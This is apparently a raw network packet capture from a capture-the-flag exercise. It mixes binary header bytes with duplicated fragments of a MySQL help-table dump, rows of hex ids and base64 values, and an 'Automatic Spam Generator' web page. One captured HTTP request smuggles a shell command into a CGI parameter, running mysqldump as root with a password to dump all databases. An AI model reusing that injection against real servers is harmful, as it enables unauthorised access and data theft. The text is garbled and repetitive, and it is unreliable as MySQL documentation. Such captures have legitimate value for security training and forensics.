PointFromText(wkt[,srid])\nConstructs a POINT value using its WKT representation and SRID.\n','',''),(286,'LOAD TABLE FROM MASTER',6,'LOAD TABLE tbl_name FROM MASTER\n\nTransfers a copy of the table from master to the slave. This statement is\nimplC bb0`BiET@/Ԁo0SE<%@@KR  3PWtڀ ; `)5\n\nBACKUP TABLE copies to the backup directory the minimum number of\ntable files needed to restore the table, after flushing any buffered changes\nto disk. The statement works only for MyISAM tables. It copies the\n*.frm definition and *.MYD data files. The *.MYI\nindex file can be rebuilt from those two files.\nThe directory should be specified as a full pathname.\n','BACKUP TABLE tbl_name [, tbl_name] ... TO \'/path/to/backup/directory\'',''),(284,'LOAD_FILE',23,' LOAD_FILE(file_name)\nReads the file and returns the file contents as a string. The file\nmust be located on the server, you must specify the full pathname to the\nfile, and you must have the FILE privilege. The file must\nbe readable by all and be smaller than max_allowed_packet bytes.\n\nIf the file doesn\'t exist or cannot be read because one of the preceding\nconditions is not satisfied, the function returns NULL.\n','mysql> UPDATE tbl_name\n SET blob_column=LOAD_FILE(\'/tmp/picture\')\n WHERE id=1;',''),(285,'POINTFROMTEXT',3,' PointFromText(wkt[,srid])\nConstructs a POINT value using its WKT representation and SRID.\n','',''),(286,'LOAD TABLE FROM MASTER',6,'LOAD TABLE tbl_name FROM MASTER\n\nTransfers a copy of the table from master to the slave. This statement is\nimplCT bbBi0`ET@/,|po0E< '@?  P2*? jf Yd@641957C1A2FC3D1567FE5708023D9D2,ucsb,MTNzEwEDAjhBQlzg5w35bAoISnWzaBGWah1x6w==
77EA6076984D6AFB720CF6390E125895,ucsb,MTNzEwEDAjk4qIGia9Hakg5q0eKk6RQAcc12RQ==
6A22C572D5E40BA465A0C3E3657F3C8A,ucsb,MTNzEwEDAjr5vjJ1Hb4lp4mrNaU6dfzuzObqIQ==
1B984D942FA5E62F97FDCAEFA723C3AC,ucsb,MTNzEwEDAjtueMcMVJU8agRwi7OdumY8tBWR2g==
9DB11910450F6AFBBB4C94AEBE155C2F,ucsb,MTNzEwEDAjyi68h8QRhMPwg3bOvK1KDkLmspog==
8DF7B0FA835D83E986B9C87A14FF22C5,ucsb,MTNzEwEDAj3YI2e0s6CXsPt/fnfXgYCYoqgNww==
BDFA908D5EB1FE2DC6F24646AA6D3FFD,ucsb,MTNzEwEDAj54ROOdgbaVhBXHzmcpMp1y33fs/A==
9621367AA8A746E519072613AAB0E6B0,ucsb,MTNzEwEDAj++9qjG2F+ekMbwlg+HsBd9ppc4Aw==
6789B650196480FA1DF7E17FAC1E4B24,ucsb,MTNzEwEDAkBfDyTjwKt4ncwXwIjSrC9//npYeg==
6B64262843417B8ACE236AA3363BB760,ucsb,MTNzEwEDAkHcWsHG9BUkcRoh/Jf0Ez8P2UFeLg==
C1CAAF2F374791AFC3FA4018C9FBE490,ucsb,MTNzEwEDAkL3UZ88PU39LVtxMseGazsOBFy7Lw==
B6F4EDFCF4C60886F4939330357C4522,ucsb,MTNzEwEDAkMuHt5PMcHyJ7iwDj7kauPOSvBh3w==
948DE4C30B02C7FB0A7DDD092016B269,ucsb,MTNzEwEDAkT8zAJPm+FwLf1mQ7yacGlSaQEu3g==
44F197F7D96189263BA1F1B4A1D52170,ucsb,MTNzEwEDAkWHxnwrPcuECI1Mre7qC9MnlUC23Q==
82696A49B34A8C75A3A17E8250D7EB32,ucsb,MTNzEwEDAka6dtb6DPizeUs6isR9mHbDYfHqog==
62035523DEDAB2C4C8C90A046473A5DC,ucsb,MTNzEwCf bb0`BiET@/o0AE< '@@  P2*? jf Yd@641957C1A2FC3D1567FE5708023D9D2,ucsb,MTNzEwEDAjhBQlzg5w35bAoISnWzaBGWah1x6w==
77EA6076984D6AFB720CF6390E125895,ucsb,MTNzEwEDAjk4qIGia9Hakg5q0eKk6RQAcc12RQ==
6A22C572D5E40BA465A0C3E3657F3C8A,ucsb,MTNzEwEDAjr5vjJ1Hb4lp4mrNaU6dfzuzObqIQ==
1B984D942FA5E62F97FDCAEFA723C3AC,ucsb,MTNzEwEDAjtueMcMVJU8agRwi7OdumY8tBWR2g==
9DB11910450F6AFBBB4C94AEBE155C2F,ucsb,MTNzEwEDAjyi68h8QRhMPwg3bOvK1KDkLmspog==
8DF7B0FA835D83E986B9C87A14FF22C5,ucsb,MTNzEwEDAj3YI2e0s6CXsPt/fnfXgYCYoqgNww==
BDFA908D5EB1FE2DC6F24646AA6D3FFD,ucsb,MTNzEwEDAj54ROOdgbaVhBXHzmcpMp1y33fs/A==
9621367AA8A746E519072613AAB0E6B0,ucsb,MTNzEwEDAj++9qjG2F+ekMbwlg+HsBd9ppc4Aw==
6789B650196480FA1DF7E17FAC1E4B24,ucsb,MTNzEwEDAkBfDyTjwKt4ncwXwIjSrC9//npYeg==
6B64262843417B8ACE236AA3363BB760,ucsb,MTNzEwEDAkHcWsHG9BUkcRoh/Jf0Ez8P2UFeLg==
C1CAAF2F374791AFC3FA4018C9FBE490,ucsb,MTNzEwEDAkL3UZ88PU39LVtxMseGazsOBFy7Lw==
B6F4EDFCF4C60886F4939330357C4522,ucsb,MTNzEwEDAkMuHt5PMcHyJ7iwDj7kauPOSvBh3w==
948DE4C30B02C7FB0A7DDD092016B269,ucsb,MTNzEwEDAkT8zAJPm+FwLf1mQ7yacGlSaQEu3g==
44F197F7D96189263BA1F1B4A1D52170,ucsb,MTNzEwEDAkWHxnwrPcuECI1Mre7qC9MnlUC23Q==
82696A49B34A8C75A3A17E8250D7EB32,ucsb,MTNzEwEDAka6dtb6DPizeUs6isR9mHbDYfHqog==
62035523DEDAB2C4C8C90A046473A5DC,ucsb,MTNzEwC˦ bbBi0`ET@/p܂Ao0E<&@?LQ  3PWtڀ  `)5emented mainly for debugging of LOAD DATA FROM MASTER.\nIt requires that the account used for connecting to the master server has the\nRELOAD and SUPER privileges on the master and the\nSELECT privilege on the master table to load.\nOn the slave side, the user that issues LOAD TABLE FROM MASTER should\nhave privileges to drop and create the table.\n\nThe conditions for LOAD DATA FROM MASTER apply here, too. For\nexample, LOAD TABLE FROM MASTER works only for MyISAM tables.\nThe timeout notes for LOAD DATA FROM MASTER apply as well.\n','',''),(287,'GROUP_CONCAT',12,' GROUP_CONCAT(expr)\nThis function returns a string result with the concatenated non-NULL\nvalues from a group. It returns NULL if there are no non-NULL\nvalues. The full syntax is as follows:\n\nGROUP_CONCAT([DISTINCT] expr [,expr ...]\n [ORDER BY {unsigned_integer | col_name | expr}\n [ASC | DESC] [,col_name ...]]\n [SEPARATOR str_val])\n','mysql> SELECT student_name,\n -> GROUP_CONCAT(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(288,'DATE_FORMAT',14,' DATE_FORMAT(date,format)\nFormats the date value according to the format string. The\nfollowing specifiers may be used in the format string:\n\n Specifier DescriptionCݦ bb0`BiET@/Ԁo0SE<&@@KQ  3PWtڀ  `)5emented mainly for debugging of LOAD DATA FROM MASTER.\nIt requires that the account used for connecting to the master server has the\nRELOAD and SUPER privileges on the master and the\nSELECT privilege on the master table to load.\nOn the slave side, the user that issues LOAD TABLE FROM MASTER should\nhave privileges to drop and create the table.\n\nThe conditions for LOAD DATA FROM MASTER apply here, too. For\nexample, LOAD TABLE FROM MASTER works only for MyISAM tables.\nThe timeout notes for LOAD DATA FROM MASTER apply as well.\n','',''),(287,'GROUP_CONCAT',12,' GROUP_CONCAT(expr)\nThis function returns a string result with the concatenated non-NULL\nvalues from a group. It returns NULL if there are no non-NULL\nvalues. The full syntax is as follows:\n\nGROUP_CONCAT([DISTINCT] expr [,expr ...]\n [ORDER BY {unsigned_integer | col_name | expr}\n [ASC | DESC] [,col_name ...]]\n [SEPARATOR str_val])\n','mysql> SELECT student_name,\n -> GROUP_CONCAT(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(288,'DATE_FORMAT',14,' DATE_FORMAT(date,format)\nFormats the date value according to the format string. The\nfollowing specifiers may be used in the format string:\n\n Specifier DescriptionCB ZZBi0`EL@/܂Sŀo0E4J@?5 3 Pk'tB )DCS ZZ0`BiEL@/go0AE4J@@5 3 Pk'tB )DC ZZBi0`EL@/܂Sŀo0E4ST@?+ 3 PtW'tP )DCШ ZZ0`BiEL@/go0AE4ST@@+ 3 PtW'tP )DC0 bbBi0`ET@/,|po0E< (@?  P2$2? 3i YdAEDAkcwmmYk7aBaipJf5k7WsknGRpNBOw==
A0CBF20D0650CB5211B51F2D26ADAE10,ucsb,MTNzEwEDAkguo1E9uKOKU9QVNcr48TkQPpOy9Q==
4FCB3F1D303EAD9E389815633A611C67,ucsb,MTNzEwEDAknD09vUdyDpoG79LYHqxxcDgKPIuw==
CE3A487AD47FD5DFDBDBA29EF9592DC7,ucsb,MTNzEwEDAkqmKpcuXtZ2jUVHpvF5spTCG6w5Gg==
AF87287DC27E6809B58DE41E037E0CC4,ucsb,MTNzEwEDAksdLM9y3YylxOv3Tx3J09noJfDN6A==
DE828720B421FEF2F383177DF6DD1FE0,ucsb,MTNzEwEDAkz2k69aGxCUGxTl9O+WnkeaizQPfA==
EC96F8BD1F93C15DB27863237A21E379,ucsb,MTNzEwEDAk2Bd/p0VQ9zEciFJqCw55C50NbeeQ==
8CE62882F0C89D91EC186CC8325F0F76,ucsb,MTNzEwEDAk5aF3Z7mwmNnWIIxl8BXhMxYYzkwg==
ACFAA0FB5E94975AD77C525CC3EC3628,ucsb,MTNzEwEDAk/tFtYYZrXLos+B6cFLgFoaTlw4lw==
3EE998E7A8A7C5CE79774CEFB8D6F0CB,ucsb,MTNzEwEDAlDp0mnyFPtq7yP8SbhX39Sbm5d8Mg==
AC629897DB5867895EFEF0E7198AA585,ucsb,MTNzEwEDAlErou2tvEQnMWTldyDsmZXRNWr0xA==
EE716562BD4ECFD7AD0A9D4A5FB54EED,ucsb,MTNzEwEDAlJJ4YDFxoXW5i2rHvbUtNeDswfufg==
50493E33B4BAAD0D83787258D7CBF659,ucsb,MTNzEwEDAlMkL6FCcn0qNKRwBeTWt8/8hqBCvg==
E96322ED3FCFD3A8A2363BF922FE56F8,ucsb,MTNzEwEDAlQgQlpUC0Ng7RPbs/Px5tOz3uLX9w==
792E7230174FC01E71BD98705198E6EB,ucsb,MTNzEwEDAlWIOAzTiiWAkZFx4W0KL8DftYq6hw==
FBCA9998E99FA297B5856AA96A310C6A,ucsb,MTNzEwEDAlYwdnb89x8HW0CpwLXvnhW45yXzAQ==
268EC7 bbBi0`ET@/p܂Ao0E<'@?LP  3PWtڀ  c)5\n %a Abbreviated weekday name (Sun..Sat)\n %b Abbreviated month name (Jan..Dec)\n %c Month, numeric (0..12)\n %D Day of the month with English suffix (0th, 1st, 2nd, 3rd, ...)\n %d Day of the month, numeric (00..31)\n %e Day of the month, numeric (0..31)\n %f Microseconds (000000..999999)\n %H Hour (00..23)\n %h Hour (01..12)\n %I Hour (01..12)\n %i Minutes, numeric (00..59)\n %j Day of year (001..366)\n %k Hour (0..23)\n %l Hour (1..12)\n %M Month name (January..December)\n %m Month, numeric (00..12)\n %p AM or PM\n %r Time, 12-hour (hh:mm:ss followed by AM or PM)\n %S Seconds (00..59)\n %s Seconds (00..59)\n %T Time, 24-hour (hh:mm:ss)\n %U Week (00..53), where Sunday is the first day of the week\n %u Week (00..53), where Monday is the first day of the week\n %V Week (01..53), where Sunday is the first day of the week; used with %X\n %v Week (01..53), where Monday is the first day of the week; used with %x\n %W Weekday name (Sunday..Saturday)\n %w Day of the week (0=Sunday..6=Saturday)\n %X Year for the week where Sunday is the first day of the week, numeric, four digits; used with %V\n %x Year for the week, where Monday is the first day of the week, CG bb0`BiET@/o0AE< (@@  P2$2? 3i YdAEDAkcwmmYk7aBaipJf5k7WsknGRpNBOw==
A0CBF20D0650CB5211B51F2D26ADAE10,ucsb,MTNzEwEDAkguo1E9uKOKU9QVNcr48TkQPpOy9Q==
4FCB3F1D303EAD9E389815633A611C67,ucsb,MTNzEwEDAknD09vUdyDpoG79LYHqxxcDgKPIuw==
CE3A487AD47FD5DFDBDBA29EF9592DC7,ucsb,MTNzEwEDAkqmKpcuXtZ2jUVHpvF5spTCG6w5Gg==
AF87287DC27E6809B58DE41E037E0CC4,ucsb,MTNzEwEDAksdLM9y3YylxOv3Tx3J09noJfDN6A==
DE828720B421FEF2F383177DF6DD1FE0,ucsb,MTNzEwEDAkz2k69aGxCUGxTl9O+WnkeaizQPfA==
EC96F8BD1F93C15DB27863237A21E379,ucsb,MTNzEwEDAk2Bd/p0VQ9zEciFJqCw55C50NbeeQ==
8CE62882F0C89D91EC186CC8325F0F76,ucsb,MTNzEwEDAk5aF3Z7mwmNnWIIxl8BXhMxYYzkwg==
ACFAA0FB5E94975AD77C525CC3EC3628,ucsb,MTNzEwEDAk/tFtYYZrXLos+B6cFLgFoaTlw4lw==
3EE998E7A8A7C5CE79774CEFB8D6F0CB,ucsb,MTNzEwEDAlDp0mnyFPtq7yP8SbhX39Sbm5d8Mg==
AC629897DB5867895EFEF0E7198AA585,ucsb,MTNzEwEDAlErou2tvEQnMWTldyDsmZXRNWr0xA==
EE716562BD4ECFD7AD0A9D4A5FB54EED,ucsb,MTNzEwEDAlJJ4YDFxoXW5i2rHvbUtNeDswfufg==
50493E33B4BAAD0D83787258D7CBF659,ucsb,MTNzEwEDAlMkL6FCcn0qNKRwBeTWt8/8hqBCvg==
E96322ED3FCFD3A8A2363BF922FE56F8,ucsb,MTNzEwEDAlQgQlpUC0Ng7RPbs/Px5tOz3uLX9w==
792E7230174FC01E71BD98705198E6EB,ucsb,MTNzEwEDAlWIOAzTiiWAkZFx4W0KL8DftYq6hw==
FBCA9998E99FA297B5856AA96A310C6A,ucsb,MTNzEwEDAlYwdnb89x8HW0CpwLXvnhW45yXzAQ==
268ECT bb0`BiET@/Ԁo0SE<'@@KP  3PWtڀ  c)5\n %a Abbreviated weekday name (Sun..Sat)\n %b Abbreviated month name (Jan..Dec)\n %c Month, numeric (0..12)\n %D Day of the month with English suffix (0th, 1st, 2nd, 3rd, ...)\n %d Day of the month, numeric (00..31)\n %e Day of the month, numeric (0..31)\n %f Microseconds (000000..999999)\n %H Hour (00..23)\n %h Hour (01..12)\n %I Hour (01..12)\n %i Minutes, numeric (00..59)\n %j Day of year (001..366)\n %k Hour (0..23)\n %l Hour (1..12)\n %M Month name (January..December)\n %m Month, numeric (00..12)\n %p AM or PM\n %r Time, 12-hour (hh:mm:ss followed by AM or PM)\n %S Seconds (00..59)\n %s Seconds (00..59)\n %T Time, 24-hour (hh:mm:ss)\n %U Week (00..53), where Sunday is the first day of the week\n %u Week (00..53), where Monday is the first day of the week\n %V Week (01..53), where Sunday is the first day of the week; used with %X\n %v Week (01..53), where Monday is the first day of the week; used with %x\n %W Weekday name (Sunday..Saturday)\n %w Day of the week (0=Sunday..6=Saturday)\n %X Year for the week where Sunday is the first day of the week, numeric, four digits; used with %V\n %x Year for the week, where Monday is the first day of the week, C bbBi0`ET@/p܂Ao0E<(@?LO  3PW tڀ  c)5numeric, four digits; used with %v\n %Y Year, numeric, four digits\n %y Year, numeric, two digits\n %% A literal \'%\'.\n \n\nAll other characters are copied to the result without interpretation.\n\nThe %v, %V, %x, and %X format specifiers are\navailable as of MySQL 3.23.8. %f is available as of MySQL 4.1.1.\n\nAs of MySQL 3.23, the \'%\' character is required before\nformat specifier characters. In earlier versions of MySQL,\n\'%\' was optional.\n\nThe reason the ranges for the month and day specifiers begin with zero\nis that MySQL allows incomplete dates such as \'2004-00-00\' to be\nstored as of MySQL 3.23.\n','mysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%W %M %Y\');\n -> \'Saturday October 1997\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%H:%i:%s\');\n -> \'22:23:00\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%D %y %a %d %m %b %j\');\n -> \'4th 97 Sat 04 10 Oct 277\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%H %k %I %r %T %S %w\');\n -> \'22 22 10 10:23:00 PM 22:23:00 00 6\'\nmysql> SELECT DATE_FORMAT(\'1999-01-01\', \'%X %V\');\n -> \'1998 52\'',''),(289,'BENCHMARK',25,' BENCHMARK(count,expr)\nThe BENCHMARK() funC bb0`BiET@/Ԁo0SE<(@@KO  3PW tڀ  c)5numeric, four digits; used with %v\n %Y Year, numeric, four digits\n %y Year, numeric, two digits\n %% A literal \'%\'.\n \n\nAll other characters are copied to the result without interpretation.\n\nThe %v, %V, %x, and %X format specifiers are\navailable as of MySQL 3.23.8. %f is available as of MySQL 4.1.1.\n\nAs of MySQL 3.23, the \'%\' character is required before\nformat specifier characters. In earlier versions of MySQL,\n\'%\' was optional.\n\nThe reason the ranges for the month and day specifiers begin with zero\nis that MySQL allows incomplete dates such as \'2004-00-00\' to be\nstored as of MySQL 3.23.\n','mysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%W %M %Y\');\n -> \'Saturday October 1997\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%H:%i:%s\');\n -> \'22:23:00\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%D %y %a %d %m %b %j\');\n -> \'4th 97 Sat 04 10 Oct 277\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%H %k %I %r %T %S %w\');\n -> \'22 22 10 10:23:00 PM 22:23:00 00 6\'\nmysql> SELECT DATE_FORMAT(\'1999-01-01\', \'%X %V\');\n -> \'1998 52\'',''),(289,'BENCHMARK',25,' BENCHMARK(count,expr)\nThe BENCHMARK() funC RRBi0`ED@/Oo+?o0E,ů@>\  P">  77; HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:43:47 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html 1dc Automatic Spam Generator Goto main page

List of the uploaded mails

Username: Password


C RR0`BiED@/Do0 E,ů@@Z  P">  77; HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:43:47 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html 1dc Automatic Spam Generator Goto main page

List of the uploaded mails

Username: Password


C bbBi0`ET@/,|po0E< )@?  P2):?  ZdD780E5C68F07D95BA3CEDC6BBEEF6,ucsb,MTNzEwEDAlf3XrDyqzqfEc14gVRr6MalChkkxQ==
9BBB2B17CAD4FF3389F54C97773364C1,ucsb,MTNzEwEDAliqycH6JK3py8qojqWTPJN/qMOQYA==
A63BDB158B2EA6A191FCFDF75F01E9FC,ucsb,MTNzEwEDAlnSlGnckvDUgVL9mFx1T0ktAvHC8A==
AEF3E1F2D053A547FA40E56A087274E6,ucsb,MTNzEwEDAlrOSzwlm4p3nZ/VN81A+AAjw/OiqQ==
A6F86037C77208DC5C07A6E92453B9A1,ucsb,MTNzEwEDAluGdL5f4Z5XCcz44MYNxxXnenPLMQ==
18DB529E152B11A47E86E12D0C7ECE7D,ucsb,MTNzEwEDAlxsw+y9fpNJIpHL7dAacu1dcLIIjg==
3993C4FDEC4ADE4C3735FB02F6AC752D,ucsb,MTNzEwEDAl29PlkxhJTK1yWruFU5oh8cR8/Thw==
3715E7F2DE2F6DD5E7EB6FA4A777821C,ucsb,MTNzEwEDAl5ARqyyZyGkE40K2jv1mftIjO15Bg==
77356A7B28673E11FFB20C7407ED1128,ucsb,MTNzEwEDAl/NBD1Lm2N2Wu1lUKU/aLtq7efTJA==
8BDBF50575FB44DD9BC0A984E6F9A2E9,ucsb,MTNzEwEDAmCK0TVQGCMW80rlsP1l5CqO3W351w==
6753F324310ADB410FA3270A6D49CE53,ucsb,MTNzEwEDAmEf4pKRwOTuBrjgFCCq2sBznIagwQ==
E20D1A968DFB81454C4699D5ED972A21,ucsb,MTNzEwEDAmJK86Cm8/BWfBDfuS8Xo/qySJJd1A==
965987AB541378AD922BF6D64A1175A2,ucsb,MTNzEwEDAmPDsMTvHs8bIkBw35K0/G+Q0hJbxA==
4E3985FB44C695FC2D1B2619DFC129DC,ucsb,MTNzEwEDAmRct72jHQp/GN0LNgx/Evcqf5IvAA==
C0FA286F56BB39C59614AF5B10A70B01,ucsb,MTNzEwEDAmVPO8Ipeu2SRUGeXrW32GvHMUAtwg==
42CD5C30AD4DAEA35BAD97BE40043E47,ucsb,MTNzEwEDAC ZZBi0`EL@/܂Sŀo0E4,@? 3 PK}Z3 )E_0C bb0`BiET@/o0AE< )@@  P2):?  ZdD780E5C68F07D95BA3CEDC6BBEEF6,ucsb,MTNzEwEDAlf3XrDyqzqfEc14gVRr6MalChkkxQ==
9BBB2B17CAD4FF3389F54C97773364C1,ucsb,MTNzEwEDAliqycH6JK3py8qojqWTPJN/qMOQYA==
A63BDB158B2EA6A191FCFDF75F01E9FC,ucsb,MTNzEwEDAlnSlGnckvDUgVL9mFx1T0ktAvHC8A==
AEF3E1F2D053A547FA40E56A087274E6,ucsb,MTNzEwEDAlrOSzwlm4p3nZ/VN81A+AAjw/OiqQ==
A6F86037C77208DC5C07A6E92453B9A1,ucsb,MTNzEwEDAluGdL5f4Z5XCcz44MYNxxXnenPLMQ==
18DB529E152B11A47E86E12D0C7ECE7D,ucsb,MTNzEwEDAlxsw+y9fpNJIpHL7dAacu1dcLIIjg==
3993C4FDEC4ADE4C3735FB02F6AC752D,ucsb,MTNzEwEDAl29PlkxhJTK1yWruFU5oh8cR8/Thw==
3715E7F2DE2F6DD5E7EB6FA4A777821C,ucsb,MTNzEwEDAl5ARqyyZyGkE40K2jv1mftIjO15Bg==
77356A7B28673E11FFB20C7407ED1128,ucsb,MTNzEwEDAl/NBD1Lm2N2Wu1lUKU/aLtq7efTJA==
8BDBF50575FB44DD9BC0A984E6F9A2E9,ucsb,MTNzEwEDAmCK0TVQGCMW80rlsP1l5CqO3W351w==
6753F324310ADB410FA3270A6D49CE53,ucsb,MTNzEwEDAmEf4pKRwOTuBrjgFCCq2sBznIagwQ==
E20D1A968DFB81454C4699D5ED972A21,ucsb,MTNzEwEDAmJK86Cm8/BWfBDfuS8Xo/qySJJd1A==
965987AB541378AD922BF6D64A1175A2,ucsb,MTNzEwEDAmPDsMTvHs8bIkBw35K0/G+Q0hJbxA==
4E3985FB44C695FC2D1B2619DFC129DC,ucsb,MTNzEwEDAmRct72jHQp/GN0LNgx/Evcqf5IvAA==
C0FA286F56BB39C59614AF5B10A70B01,ucsb,MTNzEwEDAmVPO8Ipeu2SRUGeXrW32GvHMUAtwg==
42CD5C30AD4DAEA35BAD97BE40043E47,ucsb,MTNzEwEDAC! ZZ0`BiEL@/o0  E4,@@ 3 PK}Z3 )E_0C| ""Bi0`E@/Sŀo0E,@? 3 PK}Z3I )E_0GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.13.1.3 Connection: Keep-Alive C ""0`BiE@/o0  E,@@ 3 PK}Z3I )E_0GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.13.1.3 Connection: Keep-Alive C bbBi0`ET@/p܂Ao0E<)@?LN  3PWtڀ ݐ g)6ction executes the expression expr\nrepeatedly count times. It may be used to time how fast MySQL\nprocesses the expression. The result value is always 0. The intended\nuse is from within the mysql client, which reports query execution times:\n','mysql> SELECT BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\'));\n+----------------------------------------------+\n| BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\')) |\n+----------------------------------------------+\n| 0 |\n+----------------------------------------------+\n1 row in set (4.74 sec)',''),(290,'YEAR',14,' YEAR(date)\nReturns the year for date, in the range 1000 to 9999.\n','mysql> SELECT YEAR(\'98-02-03\');\n -> 1998',''),(291,'SHOW ENGINE',6,'SHOW ENGINE displays log or status information about storage engines.\nThe following statements currently are supported:\n\nSHOW ENGINE BDB LOGS\nSHOW ENGINE INNODB STATUS\n\nSHOW ENGINE BDB LOGS displays status information about existing\nBDB log files. It returns the following fields:\n\n\n File\nThe full path to the log file.\n\n Type\nThe log file type (BDB for Berkeley DB log files).\n\n Status\nThe status of the log file (FREE if the file can be removed, or\nIN USE if the file is needed by the transaction C bb0`BiET@/Ԁo0SE<)@@KN  3PWtڀ ݐ g)6ction executes the expression expr\nrepeatedly count times. It may be used to time how fast MySQL\nprocesses the expression. The result value is always 0. The intended\nuse is from within the mysql client, which reports query execution times:\n','mysql> SELECT BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\'));\n+----------------------------------------------+\n| BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\')) |\n+----------------------------------------------+\n| 0 |\n+----------------------------------------------+\n1 row in set (4.74 sec)',''),(290,'YEAR',14,' YEAR(date)\nReturns the year for date, in the range 1000 to 9999.\n','mysql> SELECT YEAR(\'98-02-03\');\n -> 1998',''),(291,'SHOW ENGINE',6,'SHOW ENGINE displays log or status information about storage engines.\nThe following statements currently are supported:\n\nSHOW ENGINE BDB LOGS\nSHOW ENGINE INNODB STATUS\n\nSHOW ENGINE BDB LOGS displays status information about existing\nBDB log files. It returns the following fields:\n\n\n File\nThe full path to the log file.\n\n Type\nThe log file type (BDB for Berkeley DB log files).\n\n Status\nThe status of the log file (FREE if the file can be removed, or\nIN USE if the file is needed by the transaction Cb bbBi0`ET@/,|po0E< *@?  P2.B?  [dEmYVaD7+8L3/wjnsM90IOOx7Sy/vVQ==
20AE03DC1CFA4C146034DB0AEC04DFF4,ucsb,MTNzEwEDAmc0Jskkrvy7kbq/NMfd65v+eL6jeA==
EC0F9DB677DE19220866F7D88DBEA000,ucsb,MTNzEwEDAmhh+UHEO3mFVW8BgZZV/wY3IfhPwA==
9528551538523C9C5A9E79C1D79EFCBA,ucsb,MTNzEwEDAmnj/YYlv2xFvyUkm8s8Z2ebVaJwXg==
D5436E03E749952E0F4EAEEB87C4EB6A,ucsb,MTNzEwEDAmpl0CHmo1PTaAm4N14HsXh9wC0VUQ==
08519CA614AF2561B05CC9833DA53E76,ucsb,MTNzEwEDAmuNbWHmAU3g2dQh7lHS7tKR4nlCYw==
2C8C9430AE49E1BCFD681A6730B59E5D,ucsb,MTNzEwEDAmw6h4ADxqK4T3WjlywCB41UbP8ppg==
E0EF41CC710E28CACA475CAF6BC14A72,ucsb,MTNzEwEDAm1PyZEyUVKQqSvJaB77j3VhldRkWQ==
35D8536208FC8745EB956C0A56F38C0A,ucsb,MTNzEwEDAm4eKmJi6061Db0cLPZM/iX27qaiEw==
28DE28906FC69DCF227636F8C4561CD3,ucsb,MTNzEwEDAm/0lNE+XjN6CsswukNxoU1Lnpk8xA==
7D58FE620A268A446E3EE2D967EA40AB,ucsb,MTNzEwEDAnAXCDdt8C9bArtUl+/toWiYW5FpzA==
7F8E9D8ACE3F3ABE5711960D27470512,ucsb,MTNzEwEDAnEusDI9JF+vLgrgxPFbVbLvgvorcA==
5FE1E75FD7455D3D55D8F09BA745B7B9,ucsb,MTNzEwEDAnKpdCJ7NIDLcCvP8/fNVWrlyerwmw==
78CA19541126F98E0386BDE1783F0A4D,ucsb,MTNzEwEDAnNUH9UQfDPMf5t6WwQwLt35YMAlKA==
1BA0CDB48461D8F6192EF530B351C296,ucsb,MTNzEwEDAnQ8t6g4LyFIlR5EhUbzf6ogSLIgUA==
DB722ACA36282EB5F44392C22BF2CF1C,ucsb,MTNzEwEDAnVT+xzT5DhpDoukCVqml6JC0ALkug==
46417BDCu bb0`BiET@/o0AE< *@@  P2.B?  [dEmYVaD7+8L3/wjnsM90IOOx7Sy/vVQ==
20AE03DC1CFA4C146034DB0AEC04DFF4,ucsb,MTNzEwEDAmc0Jskkrvy7kbq/NMfd65v+eL6jeA==
EC0F9DB677DE19220866F7D88DBEA000,ucsb,MTNzEwEDAmhh+UHEO3mFVW8BgZZV/wY3IfhPwA==
9528551538523C9C5A9E79C1D79EFCBA,ucsb,MTNzEwEDAmnj/YYlv2xFvyUkm8s8Z2ebVaJwXg==
D5436E03E749952E0F4EAEEB87C4EB6A,ucsb,MTNzEwEDAmpl0CHmo1PTaAm4N14HsXh9wC0VUQ==
08519CA614AF2561B05CC9833DA53E76,ucsb,MTNzEwEDAmuNbWHmAU3g2dQh7lHS7tKR4nlCYw==
2C8C9430AE49E1BCFD681A6730B59E5D,ucsb,MTNzEwEDAmw6h4ADxqK4T3WjlywCB41UbP8ppg==
E0EF41CC710E28CACA475CAF6BC14A72,ucsb,MTNzEwEDAm1PyZEyUVKQqSvJaB77j3VhldRkWQ==
35D8536208FC8745EB956C0A56F38C0A,ucsb,MTNzEwEDAm4eKmJi6061Db0cLPZM/iX27qaiEw==
28DE28906FC69DCF227636F8C4561CD3,ucsb,MTNzEwEDAm/0lNE+XjN6CsswukNxoU1Lnpk8xA==
7D58FE620A268A446E3EE2D967EA40AB,ucsb,MTNzEwEDAnAXCDdt8C9bArtUl+/toWiYW5FpzA==
7F8E9D8ACE3F3ABE5711960D27470512,ucsb,MTNzEwEDAnEusDI9JF+vLgrgxPFbVbLvgvorcA==
5FE1E75FD7455D3D55D8F09BA745B7B9,ucsb,MTNzEwEDAnKpdCJ7NIDLcCvP8/fNVWrlyerwmw==
